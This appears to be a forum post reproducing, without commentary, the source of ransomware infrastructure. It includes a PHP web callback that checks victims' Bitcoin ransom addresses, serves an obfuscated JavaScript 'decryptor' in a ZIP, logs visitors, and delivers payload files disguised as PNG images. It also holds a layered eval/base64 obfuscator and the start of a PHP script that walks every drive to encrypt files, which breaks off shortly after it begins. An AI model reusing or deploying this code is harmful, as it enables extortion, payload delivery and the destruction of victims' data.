web callback source (index.php)
Code: Select all
decryptor (5.bin)
<?php
if (strlen(trim($_SERVER["HTTP_USER_AGENT"])) < 32 || strpos($_SERVER["HTTP_USER_AGENT"], "Windows NT") === false) exit;
$ads = array("17FMywjuJkpQCQaK3hxENT9yhH7Sew6Dwd","172wwa1JKd7mzLjrrPpfULStQe3smYsvi9","1NJtiqEVSHowStHzVWbyRN1rCTEpYn8srH","13yPoMcf4Fj9cigyN5pcvQwk6VenubXS19","14kAwnFyCeNdx5v9u7DEApBroEHPibX5Sh","1MjS9q9F7K8CTJnksajAz7uhDQtgjYWGV2","1Bgz4tHx62KXzL22ikTWvGiQdKTVJELf6z","1PhGvwDx6qvGSNWeezzmM1Zd26FdEB7iU1");
if (isset($_GET["a"]))
{
if (in_array($_GET["a"],$ads))
{
class z{var $s=array();var $i=array();var $o=0;function j($x){$d="";for($i=0;$i<strlen($x);$i+=2)$d.=chr(hexdec($x[$i].$x[$i+1]));return $d;} function ud(){$a=array("y"=>date("Y"),"m"=>date("m"),"d"=>date("d"),"h"=>date("H"),"i"=>date("i"),"s"=>date("s"));return (($a["y"]-1980)<<25)|($a["m"]<<21)|($a["d"]<<16)|($a["h"]<<11)|($a["i"]<<5)|($a["s"]>>1);} function a($d,$n){$n=str_replace(chr(92),"/",$n);$x=dechex($this->ud());$h=$this->j($x[6].$x[7].$x[4].$x[5].$x[2].$x[3].$x[0].$x[1]);$fr=$this->j("504b0304140000000800").$h;$u=strlen($d);$g=crc32($d);$z=gzcompress($d);$z=substr(substr($z,0,strlen($z)-4),2);$p=strlen($z);$fr.=pack("V",$g).pack("V",$p).pack("V",$u).pack("v",strlen($n)).pack("v",0).$n.$z;$this->s[]=$fr;$r=$this->j("504b01020000140000000800").$h.pack("V",$g).pack("V",$p).pack("V",$u).pack("v",strlen($n)).pack("v",0).pack("v",0).pack("v",0).pack("v",0).pack("V",32).pack("V",$this->o);$this->o+=strlen($fr);$r.=$n;$this->i[]=$r;} function f(){$d=implode("",$this->s);$l=implode("",$this->i);return $d.$l.$this->j("504b050600000000").pack("v",sizeof($this->i)).pack("v",sizeof($this->i)).pack("V",strlen($l)).pack("V",strlen($d)).$this->j("0000");}}
$dec = base64_decode("ZnVuY3Rpb24gdjM4KHA4OSxjNDgsczE1KSB7dzYyW3MxNV0gPSBwODk7fTsgdmFyIHc2MiA9IG5ldyBBcnJheSgpO3YzOCgnKG49PTQnLCA2NzQsIDIwMCk7djM4KCd9OyBpZicsIDQyMSwgMjIzKTt2MzgoJ0NPTVNQRScsIDcxMSwgMzY4KTt2MzgoJyUgL2MgJywgNjkxLCA0MTMpO3YzOCgnIG49MztuJywgOTU0LCAxMzIpO3YzOCgnIiwwLCcsIDQ5MCwgMzI2KTt2MzgoJyVDT00nLCA3NzAsIDQyNCk7djM4KCduZCgnLCAxMTYsIDE2NSk7djM4KCctYicsIDk0NCwgMzQpO3YzOCgneGEuc2EnLCA4NSwgMjExKTt2MzgoJ3RlTycsIDE2MSwgMTA5KTt2MzgoJ0MlICcsIDI4NCwgNDQwKTt2MzgoJytpK24nLCA3MjUsIDE2MCk7djM4KCcwKTsgJywgMjU3LCAzNDQpO3YzOCgnZ3MoIiUnLCA2ODQsIDc0KTt2MzgoJ2luJywgOSwgNzMpO3YzOCgnTVNQRUMnLCA1NzcsIDMxMik7djM4KCdyaScsIDU3MSwgNyk7djM4KCcodmFyIGknLCA4MzIsIDM5OCk7djM4KCdlY3QoIicsIDQxMCwgOTkpO3YzOCgndG5lcnMnLCAzMTcsIDI1KTt2MzgoJyJTT0ZUJywgNDcwLCAyODEpO3YzOCgnd3d3JywgNDk2LCA0MCk7djM4KCd0ZScsIDMyNSwgMTU1KTt2MzgoJ29zZScsIDM1LCA0MDcpO3YzOCgnY3QoJywgODc2LCAxMTEpO3YzOCgnbz1XU2NyJywgMTQsIDExOCk7djM4KCdNU1BFJywgODI1LCAzNDgpO3YzOCgnZW4oIkcnLCA5MTksIDE0OCk7djM4KCd3cz1XUycsIDUzOSwgNTYpO3YzOCgnT0RCJywgNTgyLCAxMTMpO3YzOCgnd3MnLCA1OTMsIDQzNik7djM4KCduLm9yJywgODU2LCAzMSk7djM4KCdGaWwnLCA0ODUsIDIwNCk7djM4KCciIC8nLCA1NDgsIDMwMCk7djM4KCciKStjcycsIDkyNywgNzYpO3YzOCgnVC50JywgNjE5LCAzODQpO3YzOCgnTVAlIikrJywgNzkwLCA4OSk7djM4KCdXcml0ZUwnLCAzNjgsIDQwMyk7djM4KCdZUFQudHgnLCAyNjMsIDM2MSk7djM4KCcgeG8uJywgOTA2LCAxNjMpO3YzOCgndFYnLCA1MzcsIDI5NCk7djM4KCdpbycsIDY0OSwgMzApO3YzOCgnZmknLCAzNzUsIDM3Nik7djM4KCcrYycsIDY2NiwgMzIzKTt2MzgoJ2NyaXAnLCA1MDIsIDYzKTt2MzgoJ3AiK2NzJywgMzM5LCAzNTkpO3YzOCgnRVQnLCA5NDcsIDMxNSk7djM4KCdSdW4nLCA4MDgsIDI1OCk7djM4KCdmb3IoJywgMzIsIDEzNik7djM4KCdvZWQnLCAyNDUsIDQ0KTt2MzgoJ2NvJywgNTgsIDM2KTt2MzgoJ25nJywgMTU3LCA4KTt2MzgoJ3RzKGZuJywgMjQzLCAyNDEpO3YzOCgnbmd0aDsnLCA3ODAsIDE0MSk7djM4KCcgaWYobicsIDIyMSwgMjA4KTt2MzgoJ3hvJywgNDg4LCAxNzkpO3YzOCgnO2knLCAyOTQsIDEzOSk7djM4KCdqZScsIDUzNSwgNjEpO3YzOCgnKyJIS0MnLCAyNzYsIDMzNik7djM4KCd3cy5SdScsIDUwOSwgMzQ1KTt2MzgoJ3dzJywgODE1LCAzNjUpO3YzOCgnbGwiOyB2JywgMjcxLCA5Mik7djM4KCdsb2cuJywgODMzLCAzNSk7djM4KCdERUwgIisnLCAyNDksIDQxNCk7djM4KCdxLDAsMCknLCA5NTIsIDQ0NCk7djM4KCcrIkNyeXAnLCA1MzAsIDMzOSk7djM4KCdyLycsIDY4NiwgMTU2KTt2MzgoJ25zZUJvJywgNTA4LCAxODEpO3YzOCgncStmbisnLCAyMzgsIDI2NSk7djM4KCdpKycsIDc4MiwgMTQyKTt2MzgoJzwxMCcsIDUzNCwgNDAwKTt2MzgoJ2l0JywgOTc3LCA1Mik7djM4KCdNTEhUVCcsIDMwOSwgMTAyKTt2MzgoJyhkbicsIDM2MSwgMjI0KTt2MzgoJ2NxPVN0JywgOTk5LCA2KTt2MzgoJ2VuKCk7JywgNzMzLCAxNzMpO3YzOCgnIitjcycsIDU0MCwgMzU2KTt2MzgoJzxsbC5sZScsIDQ1MSwgMTQwKTt2MzgoJ3Zpcm9uJywgMzEsIDcwKTt2MzgoJ28uJywgMzIzLCAxNjgpO3YzOCgnb24nLCA1ODAsIDMzKTt2MzgoJy9jIEQnLCA5MzgsIDQ0MSk7djM4KCd0eXBlPScsIDcwMSwgMTc1KTt2MzgoJ2FsbCcsIDY1LCAyMyk7djM4KCcuZXhlIicsIDIwMiwgNDMxKTt2MzgoJyB3cy5SdScsIDM4OCwgMjY5KTt2MzgoJ3RlZCInLCAzMTEsIDMwMyk7djM4KCcmcm5kPSInLCA3MTYsIDE1OSk7djM4KCd2YXIgJywgNjA1LCAwKTt2MzgoJysiREVDUicsIDcyMCwgMzgyKTt2MzgoJ2xlJywgNDc4LCAxMjYpO3YzOCgnQ08nLCAyNjEsIDMxMSk7djM4KCcwLDApJywgMzExLCA0MzQpO3YzOCgnIHZhcicsIDI5OCwgMTQ0KTt2MzgoJyB4by5vcCcsIDk0NSwgMTQ3KTt2MzgoJzkyKScsIDgyMCwgMTgpO3YzOCgnY3M9U3QnLCAxMTUsIDEzKTt2MzgoJ1hNTDIuWCcsIDc4NiwgMTAxKTt2MzgoJ2NxJywgNzUsIDM1Mik7djM4KCdyZScsIDEzOCwgOTcpO3YzOCgnQCI7JywgODc4LCAyKTt2MzgoJ2FrJywgODg2LCAyMzApO3YzOCgnKTsgaScsIDY5MywgMTY2KTt2MzgoJ2hwJywgNTgsIDQxNyk7djM4KCdhZD0iJywgODE4LCAxKTt2MzgoJ3A0dHMuZCcsIDE5MSwgOTEpO3YzOCgnZyBqYXAnLCA3MDcsIDMyKTt2MzgoJyIrY3ErIicsIDUzMiwgMzQxKTt2MzgoJzsgJywgNDQ2LCAyMjIpO3YzOCgnYSUnLCA5MzAsIDM1NSk7djM4KCd3cml0ZSgnLCA3MTgsIDE3OCk7djM4KCdSdScsIDkwMywgMzA5KTt2MzgoJ2goZXIpJywgNDU0LCAyMzQpO3YzOCgnU2hlbGwiJywgNTQ0LCA2NSk7djM4KCc7IH07IH0nLCAyNjEsIDIzNik7djM4KCc9MDtpJywgNzg1LCAzOTkpO3YzOCgnd3MuRXgnLCAyMDcsIDgxKTt2MzgoJzsgaScsIDY4MSwgMjM3KTt2MzgoJ29zJywgNDQ1LCAyODUpO3YzOCgnamtlbi5uJywgNjY4LCA0OSk7djM4KCdNUycsIDU5MywgMTAwKTt2MzgoJ2Vyc2lvJywgODU1LCAyOTUpO3YzOCgnIC9GJywgMzM4LCAzNDIpO3YzOCgnd3MuRXgnLCA5NSwgNjgpO3YzOCgnIiVDTycsIDE1MSwgMzI5KTt2MzgoJ2ldKyIvYycsIDQyMiwgMTUzKTt2MzgoJ1YgIitjcScsIDkyOSwgMzAxKTt2MzgoJ2ZuKyIucCcsIDYyNSwgNDE2KTt2MzgoJ3AuQ2wnLCAxOTgsIDQwNik7djM4KCcvRicsIDI1NSwgMzI1KTt2MzgoJ2VzaycsIDE2NSwgMzc5KTt2MzgoJ2NyeScsIDgxOCwgMzIxKTt2MzgoJ3BocCInLCAxMjksIDIxNik7djM4KCdsZCcsIDc3MSwgMTM4KTt2MzgoJ3RlT2InLCA5MDcsIDYwKTt2MzgoJ3RyJywgMTM1LCAzOTUpO3YzOCgnbiIrYycsIDM5NiwgMjk2KTt2MzgoJ249MTsgJywgMzM3LCAxODgpO3YzOCgnbnZpcicsIDE3NiwgODQpO3YzOCgncSsnLCA3MiwgMjk5KTt2MzgoJzsgdicsIDI1MSwgMTkpO3YzOCgnIi5waHAnLCA4MzEsIDM5Myk7djM4KCdmbisiJywgNDQ3LCA0MzApO3YzOCgncGFuZEVuJywgMTksIDY5KTt2MzgoJ0ZpbCcsIDMyNCwgMjM5KTt2MzgoJygiICIpJywgNDM2LCA1Myk7djM4KCdkb3dzIicsIDc5NSwgMjkwKTt2MzgoJytsbFsnLCA0MiwgMTUyKTt2MzgoJ3BsJywgNDI5LCA1MSk7djM4KCdxLDAsJywgNjU5LCAzNjMpO3YzOCgnYXIgZm49JywgNTUsIDY3KTt2MzgoJ2MgRCcsIDIyNiwgNDI3KTt2MzgoJyIucGhwJywgNzU3LCAyNjYpO3YzOCgnICYmICcsIDg0OSwgMjQ5KTt2MzgoJ2F0ZU9iaicsIDY1NSwgOTgpO3YzOCgnKXsnLCA0MzUsIDIyNik7djM4KCd4ZSAiK2MnLCA3ODksIDI2NCk7djM4KCdudFN0JywgNzE1LCA4Nik7djM4KCdkZScsIDE0MCwgMzcxKTt2MzgoJ0MlIC8nLCAxNjEsIDQyNik7djM4KCcrImEnLCAzMDgsIDc3KTt2MzgoJ2NzKyJwaCcsIDkzMiwgOTApO3YzOCgnc2l6ZT4xJywgOTM3LCAxODUpO3YzOCgnRmlsJywgNTQ3LCAxOTMpO3YzOCgnLDApOycsIDc3NSwgNDE5KTt2MzgoJ1BFQyUgLycsIDU5NSwgMzMxKTt2MzgoJ3BwRGF0JywgNzI2LCAzNTQpO3YzOCgnY3JpcCcsIDQwMCwgNTcpO3YzOCgneGE9JywgNDk2LCAxMDUpO3YzOCgnLkZpJywgMjI0LCAxMjUpO3YzOCgnaWYoeGEuJywgNTY4LCAxODQpO3YzOCgnJUNPTVMnLCAxNjAsIDQzOCk7djM4KCdhLnNhdmUnLCA0NDAsIDIwMik7djM4KCcsMCknLCA3MTksIDMwNyk7djM4KCdtT2JqJywgMzg3LCAxMjgpO3YzOCgnKGZuKyIuJywgMTQ4LCAyMTUpO3YzOCgnLDIpOycsIDY1MywgMjE3KTt2MzgoJ3JlYXRlTycsIDg3MSwgMTIwKTt2MzgoJ2JyZScsIDUzMiwgMjI5KTt2MzgoJ2UiKSAnLCA3LCAyNDMpO3YzOCgnU1BFJywgODk1LCA0MjUpO3YzOCgnKyJXaW4nLCA1MDcsIDI4OSk7djM4KCdpcHQuQycsIDUzOCwgMTE5KTt2MzgoJ3JpbmcuJywgOTgzLCAxNCk7djM4KCd2YXIgaT0nLCAyNzIsIDEzNyk7djM4KCdhcicsIDQ1NiwgMTYpO3YzOCgncmVhdGUnLCA2MzksIDM5MCk7djM4KCd1ZSk7ZicsIDU2MCwgMzk2KTt2MzgoJyk7fSBlJywgMTgzLCAxOTcpO3YzOCgnOyB2JywgODU5LCA1NCk7djM4KCdzdGF0dXMnLCA1NTAsIDE2OSk7djM4KCdFICcsIDExOSwgMjc3KTt2MzgoJ291bicsIDQ4MiwgMTU0KTt2MzgoJ21vdCcsIDE5OSwgMjkpO3YzOCgncSwnLCA2NzYsIDQzMyk7djM4KCdzLlJ1bignLCA3MTcsIDMyOCk7djM4KCc7IHZhciAnLCA4NDgsIDEyKTt2MzgoJ2NyaXB0JywgNDIxLCAxMjMpO3YzOCgnbCIucycsIDkyNiwgNTApO3YzOCgnQ08nLCA0OTcsIDM0Nyk7djM4KCciK2NxKyInLCA1ODEsIDI3OCk7djM4KCclVXNlJywgMzY3LCAzNzQpO3YzOCgnMyknLCA3MTYsIDE5MCk7djM4KCd4dCIrY3EnLCA2NiwgMzg1KTt2MzgoJ3ByJywgMzIxLCA0NSk7djM4KCdFQycsIDUxMywgNDEyKTt2MzgoJ2FkKyInLCAxMjYsIDE1OCk7djM4KCciK2NzKycsIDY5OSwgMjgwKTt2MzgoJ2wgIisnLCA3NjEsIDM1MSk7djM4KCdjcysiRCcsIDgzOCwgMzc4KTt2MzgoJ3JpbmdzKCcsIDc0LCA4Nyk7djM4KCdQIiknLCAyNjcsIDEwMyk7djM4KCcrYycsIDgxMSwgMzA0KTt2MzgoJ0N1cicsIDkxOCwgMjkyKTt2MzgoJ1dTY3JpJywgNDE4LCAxMDYpO3YzOCgnY3ErJywgMzA5LCA0MTUpO3YzOCgnfTsgeGEnLCAzNjQsIDIxOSk7djM4KCdzKyJSdScsIDQ4NCwgMjk3KTt2MzgoJyB2YXIgbCcsIDk1MiwgMyk7djM4KCcgdmFyJywgNTI2LCAxMTYpO3YzOCgncmVhJywgMTA0LCAxMDgpO3YzOCgnIi5waHAiJywgMzM4LCAyNTQpO3YzOCgnRmlsZScsIDgzLCAyMTQpO3YzOCgnb25tZScsIDIwNywgODUpO3YzOCgnYXIgbGw9JywgMTQ1LCAyMCk7djM4KCd9OyAnLCA3NTcsIDIxOCk7djM4KCduKCIlJywgNTM4LCAzNjcpO3YzOCgnRUxFVCcsIDc4MSwgMzM0KTt2MzgoJyl7eCcsIDY1NCwgMjAxKTt2MzgoJ0MlIC9jICcsIDg3NywgMzQ5KTt2MzgoJ2t0bycsIDc4MSwgMzU4KTt2MzgoJyAvYycsIDI0MCwgMjczKTt2MzgoJ3t9JywgMTU0LCAyMzUpO3YzOCgneGlzJywgMTA4LCAyNDcpO3YzOCgnIHRyeSB7JywgODY1LCAxNDYpO3YzOCgnY3QoIldTJywgMzg2LCA2Mik7djM4KCc9PTEnLCA1MjgsIDIyNSk7djM4KCdkPTA7ICcsIDE1LCA0KTt2MzgoJ2VjdCIpJywgODUxLCAxMjkpO3YzOCgnRVQiLCInLCA3NDUsIDE0OSk7djM4KCdXU2NyaScsIDg4MSwgOTUpO3YzOCgnOyB3cy4nLCA1MTcsIDMwOCk7djM4KCdFQyUnLCA4MjEsIDI3Mik7djM4KCdpbmcnLCA0MzUsIDEyNCk7djM4KCcrKykgJywgMTMwLCAxMzQpO3YzOCgnZGUnLCAyODksIDM1MCk7djM4KCdlKHBkJywgODQ3LCAyMDUpO3YzOCgnIlMnLCAxNTAsIDEyMik7djM4KCcvYyAiKycsIDU3LCAyNjEpO3YzOCgndFN0cicsIDg5MywgNzIpO3YzOCgnKykgeycsIDIyNSwgMTQzKTt2MzgoJy5jJywgNTI2LCAyNik7djM4KCdXQVJFIisnLCA1OTksIDI4Mik7djM4KCdzKGZuKycsIDI4NiwgMjUzKTt2MzgoJygiJywgODkzLCA0MjMpO3YzOCgnY3MnLCA4NTEsIDI4Myk7djM4KCdhbmQnLCAzMzAsIDIyKTt2MzgoJywyJywgNDcsIDE5Nik7djM4KCciY3InLCA1NzksIDIxKTt2MzgoJ0VHIERFTCcsIDczMiwgMzE0KTt2MzgoJ1J1bicsIDg3NiwgNDIyKTt2MzgoJy5jeiAnLCAyODYsIDM5KTt2MzgoJ2NzJywgNjg5LCAzMzgpO3YzOCgncHQuQycsIDI1OSwgOTYpO3YzOCgnbGVFJywgMjk3LCAyNDYpO3YzOCgnLCBmJywgNzI1LCAxNjEpO3YzOCgnbGUlIisnLCA0NzksIDM3Nyk7djM4KCciJVRFJywgNTAyLCA4OCk7djM4KCdmKHgnLCA1MjMsIDE2Nyk7djM4KCdFRyAnLCA3ODcsIDI3NSk7djM4KCcgL2MgJywgMjY1LCAzNzApO3YzOCgnZCk7fTtmJywgMzM0LCA0MDUpO3YzOCgnZEUnLCA4NjgsIDgzKTt2MzgoJ3NlKCknLCAzNTYsIDIyMSk7djM4KCcwKSB7IGQnLCA2NjgsIDE4Nyk7djM4KCdmcm9tQ2gnLCA0NDAsIDE1KTt2MzgoJzsgdmFyICcsIDc0OCwgMTA0KTt2MzgoJ2h0dCcsIDI4MSwgMTUwKTt2MzgoJ3dzLicsIDU0LCAyNTcpO3YzOCgnKCIlJywgMzM3LCA0MTApO3YzOCgnLlJ1bicsIDQ3MSwgNDA5KTt2MzgoJ3QiK2MnLCA2MjYsIDM2Mik7djM4KCcuUnVuKCInLCA0NTYsIDQzNyk7djM4KCdUZXh0RmknLCAzMSwgMzkxKTt2MzgoJyIrJywgNzU1LCAyODcpO3YzOCgnUkVHIEQnLCAzMjYsIDMzMyk7djM4KCcoIiVDT00nLCA0NTgsIDI1OSk7djM4KCdzZScsIDQzNiwgMTY0KTt2MzgoJyB3JywgMjAsIDQyMCk7djM4KCduKCIlJywgMTYwLCAyNzApO3YzOCgnaTsnLCA4NDcsIDIyOCk7djM4KCdiamVjdCgnLCA2NzYsIDEyMSk7djM4KCcpOyB2JywgNzQ4LCA2Nik7djM4KCdhLWRlbicsIDEzNywgMzgpO3YzOCgnaWYobj09JywgOTE4LCAxODkpO3YzOCgnKyIlQScsIDExMiwgMzUzKTt2MzgoJzApOyB3JywgMjIxLCAzMjcpO3YzOCgnMDA7aSsrJywgMTM4LCA0MDEpO3YzOCgncHRlZCInLCA0NjgsIDMyMik7djM4KCcuY2xvJywgMjI3LCAyMjApO3YzOCgnLlJ1JywgMTY2LCAzNjYpO3YzOCgndHMocGQpJywgMzkzLCAyNDgpO3YzOCgnOyB2JywgMzcyLCAzODcpO3YzOCgnVEVNUCUnLCAyMzMsIDc1KTt2MzgoJ2wgIicsIDMyNCwgMzcyKTt2MzgoJ2VlJywgMTM2LCA0Mik7djM4KCciK2NxLDAnLCA3MDQsIDQxOCk7djM4KCdmby5DJywgOTI2LCAzODkpO3YzOCgnLDAsMCknLCA5MiwgMzg2KTt2MzgoJ0UgJywgNDI5LCAzMTYpO3YzOCgnKSknLCA1LCAyNTUpO3YzOCgnSEtDJywgNDE5LCAzMTgpO3YzOCgnPT01JywgMjE3LCAyMDkpO3YzOCgneyAnLCA3MDcsIDEzNSk7djM4KCdmKGZvLicsIDY4NCwgMjM4KTt2MzgoJ3B0LkMnLCAzOSwgMTA3KTt2MzgoJ3A6Ly8iJywgNzM4LCAxNTEpO3YzOCgnbigiJScsIDYxMCwgMzEwKTt2MzgoJy5GaWwnLCA0NjksIDI1MSk7djM4KCcrIkRFQ1InLCAyNTksIDM2MCk7djM4KCdsZD0nLCA1NDksIDIyNyk7djM4KCcpeycsIDIyNSwgMjEwKTt2MzgoJ2ZvJywgMTQ0LCAyNTApO3YzOCgnVG8nLCAyMjcsIDIwMyk7djM4KCdlbGknLCA5NTcsIDQ4KTt2MzgoJzsgfTsnLCA5MzYsIDQ0NSk7djM4KCdyZW4nLCA4NDAsIDI5Myk7djM4KCdSIisnLCA0MDksIDMzNyk7djM4KCdQRScsIDY0OCwgNDM5KTt2MzgoJ3JQcm8nLCAzMywgMzc1KTt2MzgoJ3hhLm9wJywgNzE4LCAxNzIpO3YzOCgnaWp6JywgODA1LCA0Nik7djM4KCdvcih2YXInLCA3NTcsIDEzMSk7djM4KCdwYXInLCA1MDUsIDI0KTt2MzgoJ20gbicsIDI2MiwgMzcpO3YzOCgnIHsgJywgMzc2LCAyNTYpO3YzOCgnKyJEZXMnLCA0ODcsIDM1Nyk7djM4KCciK2NxJywgMzc0LCAyNjcpO3YzOCgnY3MnLCA2NzgsIDI4OCk7djM4KCciLDAnLCA4NDAsIDMwNik7djM4KCcwKTsgJywgMzM4LCAzNjQpO3YzOCgnWVAnLCAyNTcsIDM4Myk7djM4KCdvcicsIDc4OSwgMzk3KTt2MzgoJyJBRCcsIDExLCAxMTIpO3YzOCgnTVMnLCA5NDIsIDMzMCk7djM4KCdDT01TUCcsIDY2NiwgMjcxKTt2MzgoJ2F2ZVRvJywgNjYwLCAxOTIpO3YzOCgnIitjcSsiJywgNDAyLCAzMTcpO3YzOCgnRUwgIitjJywgNTY1LCA0NDIpO3YzOCgnZW52ZXJnJywgOTc4LCA0Nyk7djM4KCciLCcsIDczNywgMzk0KTt2MzgoJ29tIHNwJywgNDIsIDI3KTt2MzgoJ2FyIGZwPScsIDgzLCAzODgpO3YzOCgnQ3JlYScsIDM5NywgNTkpO3YzOCgncStwZCtjJywgNzcyLCA0NDMpO3YzOCgnUiIrY3MrJywgMzQzLCAzMTkpO3YzOCgnIiwwLCcsIDYzMSwgMzQzKTt2MzgoJ3ZhciAnLCAxNTQsIDUpO3YzOCgnKyIuZScsIDE0MiwgMjYzKTt2MzgoJ2R5JywgMzQ3LCAxODIpO3YzOCgnMTsnLCA2NzMsIDE3Nik7djM4KCcrY3ErIicsIDg2MCwgMzczKTt2MzgoJ0NoYXJDbycsIDU1NiwgMTApO3YzOCgnO307JywgODM4LCAyMzEpO3YzOCgnKyJDcnlwJywgMTI0LCAzMDIpO3YzOCgnIGYnLCAxNjMsIDExNyk7djM4KCdsZShmbisnLCA1ODksIDM5Mik7djM4KCdTeXN0ZScsIDI2LCAxMjcpO3YzOCgnLnNwJywgODg0LCA0MSk7djM4KCc9PTInLCA3MjQsIDE3MCk7djM4KCdmby5GaScsIDU0MCwgMjQ1KTt2MzgoJzsgZicsIDEsIDEzMCk7djM4KCdhbHNlKTsnLCA2NDYsIDE2Mik7djM4KCcwMCkgeyAnLCA3NiwgMTcxKTt2MzgoJytjcysiJywgNjYzLCAyOTEpO3YzOCgnQ29kZSgnLCA5MzYsIDE3KTt2MzgoJ2UoZm4rIicsIDcwMCwgMTk0KTt2MzgoJ2luZShhJywgMTIsIDQwNCk7djM4KCdsZycsIDU0NywgNDMpO3YzOCgnbWVuJywgNTQzLCA3MSk7djM4KCcrIi5leCcsIDE3NSwgMjQyKTt2MzgoJ2VFeGlzJywgODIwLCAyNDApO3YzOCgnKCk7IHdzJywgMTk3LCA0MDgpO3YzOCgnY2F0YycsIDgyMSwgMjMzKTt2MzgoJ3IgJywgNTIsIDc5KTt2MzgoJ0RFTEVUJywgMjU4LCAyNzYpO3YzOCgndC4nLCA5NjMsIDY0KTt2MzgoJyB4YS4nLCA3MDQsIDE3Nyk7djM4KCcsMik7fSAnLCA3OTUsIDIwNik7djM4KCdiamUnLCA1NTYsIDExMCk7djM4KCcwMCcsIDY2MSwgMTg2KTt2MzgoJ0UgIitjcScsIDM0MiwgMzM1KTt2MzgoJyYmICcsIDM5NCwgMjQ0KTt2MzgoJ3MuJywgODcwLCA0MjEpO3YzOCgnb2Z0JywgNjgsIDI4Nik7djM4KCdFTCAiK2MnLCAxODAsIDQyOCk7djM4KCcpe2ZwLicsIDg5MSwgNDAyKTt2MzgoJy5yZXNwbycsIDc5NCwgMTgwKTt2MzgoJytjJywgNTI3LCA0MzIpO3YzOCgncSsiIC9GJywgNjQ2LCAzMDUpO3YzOCgnLmZyb20nLCA2NjUsIDkpO3YzOCgncGFuJywgNTM1LCA4Mik7djM4KCcgfSAnLCA5MjEsIDIzMik7djM4KCc/YWQ9IisnLCA0MzksIDE1Nyk7djM4KCdjcycsIDMzNSwgMzgxKTt2MzgoJyBkbj0wOycsIDk1NiwgMTQ1KTt2MzgoJ3RvcCIrJywgMTcsIDM4MCk7djM4KCc8PTU7bicsIDg0MSwgMTMzKTt2MzgoJyIuJywgOTgsIDMyMCk7djM4KCc7ICcsIDMxLCA0MzUpO3YzOCgnbigiJScsIDQ2OSwgMzQ2KTt2MzgoJ2RlKDM0KScsIDYxMywgMTEpO3YzOCgnIHhhLicsIDMyNCwgMTc0KTt2MzgoJ2ZuJywgOTY3LCAyNjIpO3YzOCgncSsnLCAyMDksIDQyOSk7djM4KCclIC9jIFInLCA1MDcsIDMxMyk7djM4KCciOyB2YScsIDc1NSwgNzgpO3YzOCgnQyUnLCA2OTksIDM2OSk7djM4KCdDT01TUCcsIDI5MCwgNDExKTt2MzgoJysiTWljcicsIDYzMiwgMjg0KTt2MzgoJ0hLQ1UnLCA0NTgsIDI3OSk7djM4KCdxKyIgJywgMjY3LCAzMjQpO3YzOCgnYXIgJywgOTgsIDU1KTt2MzgoJ3QuJywgMTMxLCA1OCk7djM4KCd2ZScsIDc2OCwgMjEyKTt2MzgoJ20iKTsnLCA3MjksIDExNSk7djM4KCd0ZWQnLCA2NjMsIDM0MCk7djM4KCd7eGEucycsIDM4NywgMTkxKTt2MzgoJyk7ICcsIDM3NiwgMTgzKTt2MzgoJ2Vsc2UnLCAyMjgsIDIwNyk7djM4KCdwZD0nLCA4NDksIDgwKTt2MzgoJyBSJywgMTk2LCAyNzQpO3YzOCgnLlN0cmVhJywgMjA1LCAxMTQpO3YzOCgneG89JywgMjQ1LCA5NCk7djM4KCdpZicsIDkwMSwgMTk5KTt2MzgoJywxLDEpOycsIDU1MywgMjY4KTt2MzgoJ2VFeGlzdCcsIDczOSwgMjUyKTt2MzgoJy5leGUiJywgNTA2LCAxOTUpO3YzOCgnVG8nLCAzLCAyMTMpO3YzOCgnYyAnLCA1OTEsIDMzMik7djM4KCdhY2UnLCA2NDIsIDI4KTt2MzgoJ2FyICcsIDgyNiwgOTMpO3YzOCgnU1BFQyUgJywgMjYsIDI2MCk7djM4KCduIitjJywgMjUxLCAyOTgpO3YzOCgnbHNlICcsIDE1NSwgMTk4KTt3NjIgPSB3NjIuam9pbigiIik7IGV2YWwodzYyKTs=");
$dec = str_replace("@", $_GET["a"], $dec);
$zip=new z();
$zip->a($dec, "DECRYPT.js");
$cn = $zip->f();
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".strlen($cn));
header("Content-Disposition: attachment; filename=DECRYPT.zip");
header("Content-Type: application/octet-stream");
print $cn;
exit;
}
else
{
header ("Content-type: text/plain");
print "Access denied. Waiting for a payment...";
}
}
elseif (isset($_GET["id"]) || isset($_GET["ad"]))
{
$n = (isset($_GET["rnd"])) ? substr($_GET["rnd"],-1)*1 : 0;
$fp = @fopen("document.txt", "a");
@fputs($fp, time()."\t".$_SERVER["REMOTE_ADDR"]."\t".$_SERVER["HTTP_HOST"]."\t".$_SERVER["REQUEST_URI"]."\n");
@fclose($fp);
if (@file_exists($n.".bin"))
{
header("Content-Type: image/png");
header("Content-Disposition: attachment; filename=".substr(md5(mt_rand(1,10000000)),0,mt_rand(1,16)).".png");
if ($n == 5)
{
$act = (in_array($_GET["ad"],$ads) && !isset($_GET["id"])) ? "d" : "e";
$php = file_get_contents($n.".bin");
$key = "";
for ($i=0; $i<strlen($_GET["ad"]); $i++) $key .= chr((ord($_GET["ad"][$i])*($i+1))%256).chr((ord($_GET["ad"][$i])*($i+2))%256).chr((ord($_GET["ad"][$i])*($i+3))%256);
$php = str_replace("<%ACT%>", $act, $php);
$php = str_replace("<%KEY%>", base64_encode($key), $php);
$php = str_replace("<%DRF%>", "67", $php);
$php = str_replace("<%DRT%>", "90", $php);
function Senc($str)
{
$enc = array();
for ($i=0; $i<strlen($str); $i++) $enc[] = (mt_rand(1,100) < 80 && $str[$i] != chr(34) && $str[$i] != chr(46)) ? chr(34).$str[$i].chr(34) : "chr(".ord($str[$i]).")";
return str_replace(chr(34).chr(46).chr(34), "", implode($enc,"."));
}
$php = trim(str_replace("<"."?php", "", str_replace("?".">", "", $php)));
$preg = "$".chr(mt_rand(97,122)).mt_rand(1,1000);
$block = "$".chr(mt_rand(97,122)).mt_rand(1,1000);
$templ = "$".chr(mt_rand(97,122)).mt_rand(1,1000);
$trash = md5(mt_rand(1,1000000));
$php = "<"."?php ".$preg."=".Senc("preg_replace").";".$block."=".Senc("eval(base64_decode(".chr(34).base64_encode($php).chr(34)."));").";".$templ."=".Senc("/".$trash."/e").";preg_replace(".$templ.",".$block.",".Senc($trash)."); ?".">";
header("Content-Length: ".strlen($php));
print $php;
}
else
{
header("Content-Length: ".@filesize($n.".bin"));
@readfile($n.".bin");
}
}
exit;
}
?>
Code: Select all
<?php
set_time_limit(0);
for($i=<%DRF%>;$i<=<%DRT%>;$i++) if(@is_dir(chr($i).':')) Tree(chr($i).':');
function Tree($p)
{
$a='<%ACT%>';
$k=base64_decode('<%KEY%>');
$s=chr(92);
